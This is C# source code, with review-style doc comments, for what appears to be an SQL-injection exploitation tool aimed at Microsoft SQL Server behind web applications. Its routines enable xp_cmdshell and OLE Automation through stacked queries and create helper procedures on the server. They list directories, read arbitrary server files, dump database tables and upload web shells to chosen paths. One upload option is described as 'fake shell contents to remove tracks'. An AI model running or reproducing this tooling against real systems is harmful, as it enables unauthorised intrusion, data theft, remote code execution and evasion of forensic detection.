/// <summary>
/// Runs the interactive directory-listing session against <paramref name="url"/>.
/// </summary>
/// <remarks>
/// Flow, as visible in this method:
/// 1. build a confirmation URL carrying QueriesDB.Replacement and check it with
///    ResponseFilter.confirmResponce;
/// 2. create the server-side helper through createFuncDir;
/// 3. prompt for directories and pass each one to navigate until the operator enters "x";
/// 4. remove the helper with dropObject and QueriesDB.DropFuncQuery.
/// The helper is dropped only when the loop ends normally; an exception thrown by navigate
/// skips the cleanup, so the object would presumably remain on the database server.
/// </remarks>
/// <param name="url">Target URL handed unchanged to the query builders.</param>
public static void initialize(string url)
{
    Log.logNotification("Confirming Web Response..");
    var confirmationUrl = QueryCrafter.constructURLForConfirmation(url, QueriesDB.Replacement);

    if (!ResponseFilter.confirmResponce(confirmationUrl, QueriesDB.Replacement))
    {
        Log.logError("No response from the server..");
        return;
    }

    Log.logNotification("Web Response is OK..");
    if (!createFuncDir(url))
    {
        // Nothing was created, so there is nothing to drop either.
        return;
    }

    while (true)
    {
        string requestedDir = UserInteraction.takeInputString("Press 'x' for Exit..\nEnter Directory to get listing.. eg C:\\, C:\\users\\.. ");
        if (requestedDir == "x")
        {
            break;
        }

        navigate(url, requestedDir);
    }

    dropObject(url, QueriesDB.DropFuncQuery);
}
/// <summary>
/// Requests the contents of <paramref name="fileName"/> through the query template
/// QueriesDB.ReadFileOpenRowSetQuery and returns them with every space character removed.
/// </summary>
/// <param name="url">Target URL handed to QueryCrafter.constructQueryForSelectObject.</param>
/// <param name="fileName">
/// Value substituted verbatim for the "[FILENAME]" placeholder; no escaping or validation
/// is applied here.
/// </param>
/// <returns>
/// The filtered response without spaces, or <c>null</c> when the HTTP call or
/// ResponseFilter.getPureResponseWithLastIndex yields <c>null</c>.
/// </returns>
public static string ReadFileDirect(string url, string fileName)
{
    string template = QueryCrafter.constructQueryForSelectObject(url, QueriesDB.ReadFileOpenRowSetQuery);
    string requestUrl = template.Replace("[FILENAME]", fileName);

    var response = HTTPMethods.getResponse(requestUrl);
    if (response == null)
    {
        return null;
    }

    response = ResponseFilter.getPureResponseWithLastIndex(response);
    if (response == null)
    {
        return null;
    }

    // Spaces are stripped from the whole payload, including any that belong to the file itself.
    return response.Replace(" ", "");
}
/// <summary>
/// Sends <paramref name="stackedQuery"/> to the target, then reads the result back through
/// a second request and parses it into an array.
/// </summary>
/// <remarks>
/// The first URL comes from QueryCrafter.construcQueryForTableDump and is accepted only if
/// ResponseFilter.confirmResponce succeeds for <paramref name="replacement"/>. The second
/// URL comes from QueryCrafter.constructURLForOutputFromTempTable. This method does not
/// remove whatever the first request created; getColumns calls dropTempTable afterwards.
/// </remarks>
/// <param name="url">Target URL handed to the query builders.</param>
/// <param name="stackedQuery">Query text forwarded to construcQueryForTableDump.</param>
/// <param name="replacement">Marker expected in the confirmation response.</param>
/// <returns>
/// The parsed objects, or <c>null</c> when the confirmation fails or the output request
/// returns no response.
/// </returns>
public static string[] getObjects(string url, string stackedQuery, string replacement)
{
    string dumpUrl = QueryCrafter.construcQueryForTableDump(url, stackedQuery, replacement);
    if (!ResponseFilter.confirmResponce(dumpUrl, replacement))
    {
        return null;
    }

    string outputUrl = QueryCrafter.constructURLForOutputFromTempTable(url);
    var response = HTTPMethods.getResponse(outputUrl);
    if (response == null)
    {
        return null;
    }

    // NOTE(review): getPureResponse's result is passed on unchecked; confirm parseResponce accepts null.
    response = ResponseFilter.getPureResponse(response);
    return ResponseFilter.parseResponce(response);
}
/// <summary>
/// Lists the columns of <paramref name="tableName"/> and, when any are returned, continues
/// with dumpData for that table.
/// </summary>
/// <remarks>
/// The column query is built from QueriesDB.ColumnStackedQuery and run through getObjects.
/// On success the temporary table is dropped before the columns are shown. When getObjects
/// returns <c>null</c> nothing else happens, so no drop request is sent in that case.
/// </remarks>
/// <param name="url">Target URL handed to the helpers.</param>
/// <param name="tableName">Table whose columns are requested.</param>
public static void getColumns(string url, string tableName)
{
    string columnQuery = QueryCrafter.constructQueryForColumns(QueriesDB.ColumnStackedQuery, tableName);
    string[] columnNames = getObjects(url, columnQuery, QueriesDB.Replacement);

    if (columnNames == null)
    {
        return;
    }

    dropTempTable(url, QueriesDB.DropTableStackedQuery, QueriesDB.Replacement);
    Log.showObjects(columnNames, "COLUMN");
    dumpData(url, tableName, columnNames);
}
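/// <summary>
/// Sends the drop request for the temporary table and reports whether the response
/// contains <paramref name="replacement"/>.
/// </summary>
/// <remarks>
/// The confirmation URL is always built with QueriesDB.Replacement, while the response is
/// checked against the <paramref name="replacement"/> argument; the two agree only when
/// the caller passes QueriesDB.Replacement.
/// </remarks>
/// <param name="url">Target URL; rewritten locally by the two query builders.</param>
/// <param name="dropTableStackedQuery">Drop statement forwarded to constructURLForDroppingObject.</param>
/// <param name="replacement">Marker that must appear in the response.</param>
/// <returns>
/// <c>true</c> when a response arrived and contains the marker; <c>false</c> otherwise,
/// including when no response arrived.
/// </returns>
public static bool dropTempTable(string url, string dropTableStackedQuery, string replacement)
{
    url = QueryCrafter.constructURLForConfirmation(url, QueriesDB.Replacement);
    url = QueryCrafter.constructURLForDroppingObject(url, dropTableStackedQuery);

    // Every other caller in this file treats a null result from getResponse as "no answer";
    // dereferencing it here would throw instead of reporting a failed drop.
    var response = HTTPMethods.getResponse(url);
    return response != null && response.Contains(replacement);
}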
/// <summary>
/// Sends the stacked query QueriesDB.EnableXPCMDShell to the target and reports whether the
/// confirmation marker came back.
/// </summary>
/// <remarks>
/// The literal 'rummykhan' in the built URL is replaced with QueriesDB.Replacement before
/// the request is confirmed.
/// NOTE(review): the statement text is defined in QueriesDB and not shown here. If it
/// changes the xp_cmdshell server option, as the name suggests, that is a server-level
/// configuration change defenders can audit on the database host.
/// </remarks>
/// <param name="url">Target URL handed to QueryCrafter.constructStackedQuery.</param>
/// <returns><c>true</c> when ResponseFilter.confirmResponce succeeds; otherwise <c>false</c>.</returns>
public static bool enableXPCMDShell(string url)
{
    string requestUrl = QueryCrafter
        .constructStackedQuery(url, QueriesDB.EnableXPCMDShell)
        .Replace("'rummykhan'", QueriesDB.Replacement);

    if (!ResponseFilter.confirmResponce(requestUrl, QueriesDB.Replacement))
    {
        Log.logError("Failed to Enable XP CMD Shell..");
        return false;
    }

    Log.logOutput("XP CMD Shell Enabled..");
    return true;
}
/// <summary>
/// Sends the stacked query QueriesDB.EnableOLEAutomation to the target and reports whether
/// the confirmation marker came back.
/// </summary>
/// <remarks>
/// The literal 'rummykhan' in the built URL is replaced with QueriesDB.Replacement before
/// the request is confirmed.
/// NOTE(review): the statement text is defined in QueriesDB and not shown here. If it
/// turns on the OLE Automation Procedures server option, as the name and log message
/// suggest, that is a server-level configuration change defenders can audit.
/// </remarks>
/// <param name="url">Target URL handed to QueryCrafter.constructStackedQuery.</param>
/// <returns><c>true</c> when ResponseFilter.confirmResponce succeeds; otherwise <c>false</c>.</returns>
public static bool enableOLEAutomation(string url)
{
    string requestUrl = QueryCrafter
        .constructStackedQuery(url, QueriesDB.EnableOLEAutomation)
        .Replace("'rummykhan'", QueriesDB.Replacement);

    if (!ResponseFilter.confirmResponce(requestUrl, QueriesDB.Replacement))
    {
        Log.logError("Failed to Enable OLE Automation Procedures..");
        return false;
    }

    Log.logOutput("OLE Automation Enabled..");
    return true;
}
/// <summary>
/// Confirms that the target echoes QueriesDB.Replacement and, if so, starts the table
/// enumeration through getTables.
/// </summary>
/// <param name="url">Target URL handed to the query builder and to getTables.</param>
public static void initialize(string url)
{
    Log.logNotification("Confirming Web Response..");
    var confirmationUrl = QueryCrafter.constructURLForConfirmation(url, QueriesDB.Replacement);

    bool targetResponds = ResponseFilter.confirmResponce(confirmationUrl, QueriesDB.Replacement);
    if (!targetResponds)
    {
        Log.logError("No response from the server..");
        return;
    }

    Log.logNotification("Web Response is OK..");
    getTables(url);
}
/// <summary>
/// Requests a listing of <paramref name="dir"/> through QueriesDB.ReadDirWithFuncQuery and
/// prints the parsed entries.
/// </summary>
/// <remarks>
/// The response is filtered, wrapped with XML.addRoot, written to "tmp.txt" and parsed
/// back from that file.
/// NOTE(review): the response is not null-checked before filtering, unlike the other
/// callers of HTTPMethods.getResponse in this file. "tmp.txt" is a fixed relative name and
/// is not removed here.
/// </remarks>
/// <param name="url">Target URL handed to QueryCrafter.constructQueryForSelectObject.</param>
/// <param name="dir">Value substituted verbatim for the "[DIR]" placeholder.</param>
static void navigate(string url, string dir)
{
    var listingUrl = QueryCrafter
        .constructQueryForSelectObject(url, QueriesDB.ReadDirWithFuncQuery)
        .Replace("[DIR]", dir);

    var response = HTTPMethods.getResponse(listingUrl);
    response = ResponseFilter.getPureResponseWithLastIndex(response);
    response = XML.addRoot(response);

    // The listing is round-tripped through a file because XML.parseXML takes a path.
    FileIO.createWriteFile(response, "tmp.txt");
    List<string> entries = XML.parseXML("tmp.txt", "dir");

    Log.showObjects(entries, "DIR Listing");
}
/// <summary>
/// Creates the server-side procedure defined by QueriesDB.UploadFileProcQuery and verifies
/// that it exists.
/// </summary>
/// <remarks>
/// Two requests are made: the creation request, accepted only when
/// ResponseFilter.confirmResponce sees QueriesDB.Replacement, and a lookup built from
/// QueriesDB.ConfirmFcUkProcQuery whose filtered response must equal "FcUk". Any exception
/// is logged by message and reported as failure.
/// NOTE(review): the compared value "FcUk" is presumably the procedure's name; a procedure
/// of that name appearing in the database would then be a trace of this step.
/// </remarks>
/// <param name="url">Target URL handed to the query builders.</param>
/// <returns><c>true</c> only when the lookup returns "FcUk"; otherwise <c>false</c>.</returns>
static bool createProcFcUk(string url)
{
    try
    {
        var creationUrl = QueryCrafter.constructStackedQuery(url, QueriesDB.UploadFileProcQuery);
        creationUrl = QueryCrafter.constructURLForConfirmation(creationUrl, QueriesDB.Replacement);

        if (!ResponseFilter.confirmResponce(creationUrl, QueriesDB.Replacement))
        {
            Log.logError("Erroneous response from the server..");
            Log.logError("Procedure to Upload Shell cannot be created..");
            return false;
        }

        var lookupUrl = QueryCrafter.constructQueryForSelectObject(url, QueriesDB.ConfirmFcUkProcQuery);
        var response = HTTPMethods.getResponse(lookupUrl);
        if (response == null)
        {
            Log.logError("2 Procedure to Upload Shell cannot be created..");
            return false;
        }

        if (ResponseFilter.getPureResponseWithLastIndex(response) != "FcUk")
        {
            Log.logError("1 Procedure to Upload Shell cannot be created..");
            return false;
        }

        Log.logOutput("Procedure to Upload Shell is created..");
        return true;
    }
    catch (Exception ex)
    {
        Log.logError(ex.Message);
        return false;
    }
}
/// <summary>
/// Creates the server-side function defined by QueriesDB.DirListingFuncQuery and verifies
/// that it exists.
/// </summary>
/// <remarks>
/// Two requests are made: the creation request, accepted only when
/// ResponseFilter.confirmResponce sees QueriesDB.Replacement, and a lookup built from
/// QueriesDB.ConfirmDirFuncQuery whose filtered response must equal "Dir". Any exception
/// is logged by message and reported as failure.
/// </remarks>
/// <param name="url">Target URL handed to the query builders.</param>
/// <returns><c>true</c> only when the lookup returns "Dir"; otherwise <c>false</c>.</returns>
static bool createFuncDir(string url)
{
    try
    {
        var creationUrl = QueryCrafter.constructStackedQuery(url, QueriesDB.DirListingFuncQuery);
        creationUrl = QueryCrafter.constructURLForConfirmation(creationUrl, QueriesDB.Replacement);

        if (!ResponseFilter.confirmResponce(creationUrl, QueriesDB.Replacement))
        {
            Log.logError("Erroneous response from the server..");
            Log.logError("Function to get Directory Listing cannot be created..");
            return false;
        }

        var lookupUrl = QueryCrafter.constructQueryForSelectObject(url, QueriesDB.ConfirmDirFuncQuery);
        var response = HTTPMethods.getResponse(lookupUrl);

        // A missing response and a wrong lookup value are reported with the same message.
        if (response == null || ResponseFilter.getPureResponseWithLastIndex(response) != "Dir")
        {
            Log.logError("Function to get Directory Listing cannot be created..");
            return false;
        }

        Log.logOutput("Function to get Directory Listing is created..");
        return true;
    }
    catch (Exception ex)
    {
        Log.logError(ex.Message);
        return false;
    }
}
/// <summary>
/// Sends the drop statement <paramref name="ObjectDroppingQuery"/> to the target and
/// reports whether the confirmation marker came back.
/// </summary>
/// <remarks>
/// Callers in this file ignore the return value, so a failed drop is not reported to the
/// operator and the created object would presumably stay on the database server.
/// </remarks>
/// <param name="url">Target URL handed to QueryCrafter.constructURLForDroppingObject.</param>
/// <param name="ObjectDroppingQuery">Drop statement to embed in the request.</param>
/// <returns>
/// The result of ResponseFilter.confirmResponce, or <c>false</c> when an exception was
/// thrown (its message is logged).
/// </returns>
static bool dropObject(string url, string ObjectDroppingQuery)
{
    try
    {
        var dropUrl = QueryCrafter.constructURLForDroppingObject(url, ObjectDroppingQuery);
        dropUrl = QueryCrafter.constructURLForConfirmation(dropUrl, QueriesDB.Replacement);

        return ResponseFilter.confirmResponce(dropUrl, QueriesDB.Replacement);
    }
    catch (Exception ex)
    {
        Log.logError(ex.Message);
        return false;
    }
}
/// <summary>
/// Interactive loop that requests files by path through QueriesDB.ReadFileOpenRowSetQuery,
/// prints their contents and optionally saves them.
/// </summary>
/// <remarks>
/// The operator's input replaces the "[FILENAME]" placeholder verbatim. The loop ends only
/// when "x" is entered at the path prompt; any answer at the save prompt, including "x",
/// returns to the path prompt. A missing HTTP response is skipped without a message.
/// </remarks>
/// <param name="url">Target URL handed to QueryCrafter.constructQueryForSelectObject.</param>
public static void Read(string url)
{
    string template = QueryCrafter.constructQueryForSelectObject(url, QueriesDB.ReadFileOpenRowSetQuery);

    while (true)
    {
        string requestedPath = UserInteraction.takeInputString("Press x to exit..\nEnter full/root path for file to read.. eg. E:\\inetpub\\site\\somefile.ext ..");
        if (requestedPath == "x")
        {
            break;
        }

        string requestUrl = template.Replace("[FILENAME]", requestedPath);
        var response = HTTPMethods.getResponse(requestUrl);
        if (response == null)
        {
            continue;
        }

        response = ResponseFilter.getPureResponseWithLastIndex(response);
        if (response == null)
        {
            Log.logError("Either File is empty or you 've no right to read that File..");
            continue;
        }

        Log.logOutput("--- [File Contents Start] ---");
        Log.logOutput(response);
        Log.logOutput("--- [File Cotents End] ---");

        string saveChoice = UserInteraction.takeInputString("Press s to save File Or Enter to Ignore..");
        if (saveChoice == "s")
        {
            SaveFile(response);
        }
    }
}
/// <summary>
/// Interactive loop that writes a file to an operator-supplied path on the target through
/// the procedure set up by createProcFcUk, then checks the result with confirmFileUpload.
/// </summary>
/// <remarks>
/// Flow, as visible in this method:
/// 1. confirm that the target echoes QueriesDB.Replacement;
/// 2. create the helper procedure;
/// 3. for each entered path and file name, pick QueriesDB.FileUploadingQueryFAKE when the
///    operator answers "f" and QueriesDB.FileUploadingQueryREAL for any other answer, fill
///    the "[PATH]", "[FILENAME]" and "rummykhan" placeholders verbatim and send the request;
/// 4. drop the helper with QueriesDB.DropFcUkProcQuery.
/// The drop request is sent even when createProcFcUk reported failure, and its result is
/// ignored. For defenders, the visible traces of this routine are the create and drop of
/// the helper procedure and a new file under the entered directory; the query text itself
/// lives in QueriesDB and is not shown here.
/// </remarks>
/// <param name="url">Target URL handed to the query builders and helpers.</param>
public static void Spawn(string url)
{
    Log.logNotification("Confirming Web Response..");
    var confirmationUrl = QueryCrafter.constructURLForConfirmation(url, QueriesDB.Replacement);

    if (!ResponseFilter.confirmResponce(confirmationUrl, QueriesDB.Replacement))
    {
        Log.logError("No response from the server..");
        return;
    }

    Log.logNotification("Web Response is OK..");

    if (createProcFcUk(url))
    {
        while (true)
        {
            string rootPath = UserInteraction.takeInputString("Press x for Exit..\nEnter root for folder path C:\\websites\\somedir\\ ");
            if (rootPath == "x")
            {
                break;
            }

            string fileName = UserInteraction.takeInputString("Enter filename to upload eg. shell.aspx ..");
            string contentChoice = UserInteraction.takeInputString("Press 'r' for using Real Shell Contents..\nPress 'f' for fake Shell Contens to remove tracks..");

            // Only "f" selects the FAKE template; every other answer falls through to REAL.
            string uploadUrl = contentChoice == "f"
                ? QueryCrafter.constructStackedQuery(url, QueriesDB.FileUploadingQueryFAKE)
                : QueryCrafter.constructStackedQuery(url, QueriesDB.FileUploadingQueryREAL);

            uploadUrl = uploadUrl.Replace("[PATH]", rootPath);
            uploadUrl = uploadUrl.Replace("[FILENAME]", fileName);
            uploadUrl = uploadUrl.Replace("rummykhan", QueriesDB.Replacement);

            string destination = rootPath + fileName;
            Log.logNotification("Uploading shell to " + destination);

            if (!ResponseFilter.confirmResponce(uploadUrl, QueriesDB.Replacement))
            {
                // An unconfirmed request is skipped without a message.
                continue;
            }

            Log.logNotification("Confirming File Upload..");
            if (confirmFileUpload(url, destination))
            {
                Log.logOutput("Shell uploaded successfully to : " + destination);
            }
            else
            {
                Log.logError("Fail to upload file..");
            }
        }
    }

    dropObject(url, QueriesDB.DropFcUkProcQuery);
}
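/// <summary>
/// Retrieves the rows of <paramref name="UserSelectedTable"/> through
/// QueriesDB.TableDumpQuery and hands them to dumpXML, with an optional second attempt
/// that uses a different response filter.
/// </summary>
/// <remarks>
/// Nothing is requested when the operator supplies no output file name. The second attempt
/// sends the same query again and filters it with getPureResponseWithLastIndex instead of
/// getPureResponse. "tmp.txt" is deleted at the end in every case that returns normally.
/// </remarks>
/// <param name="url">Target URL handed to QueryCrafter.constructQueryForDataDump.</param>
/// <param name="UserSelectedTable">Table whose rows are requested.</param>
/// <param name="Columns">Column names forwarded to dumpXML.</param>
public static void dumpData(string url, string UserSelectedTable, string[] Columns)
{
    string FileName = UserInteraction.takeInputForTableFileGeneration();

    if (!String.IsNullOrEmpty(FileName))
    {
        var XAML = XML.addRoot(ResponseFilter.getPureResponse(HTTPMethods.getResponse(QueryCrafter.constructQueryForDataDump(url, UserSelectedTable, QueriesDB.TableDumpQuery))));
        dumpXML(XAML, UserSelectedTable, FileName, Columns);

        Log.logNotification("If ur unable to see table Data, dont worry I've another method..");
        UserInteraction.promptForUserInput("Press 'n' to try another method OR Press any key to continue..");

        // Console.ReadLine returns null at end of input (closed or redirected stdin);
        // the static Equals treats that as "not n" instead of throwing.
        var UserInput = Console.ReadLine();
        if (String.Equals(UserInput, "n", StringComparison.OrdinalIgnoreCase))
        {
            XAML = XML.addRoot(ResponseFilter.getPureResponseWithLastIndex(HTTPMethods.getResponse(QueryCrafter.constructQueryForDataDump(url, UserSelectedTable, QueriesDB.TableDumpQuery))));
            dumpXML(XAML, UserSelectedTable, FileName, Columns);
        }

        Log.logNotification("Data dump complete.. and if no data is displayed to you.. table might be empty.. Press any key to continue..");
        Console.ReadKey();
    }

    FileIO.deleteTempFile("tmp.txt");
}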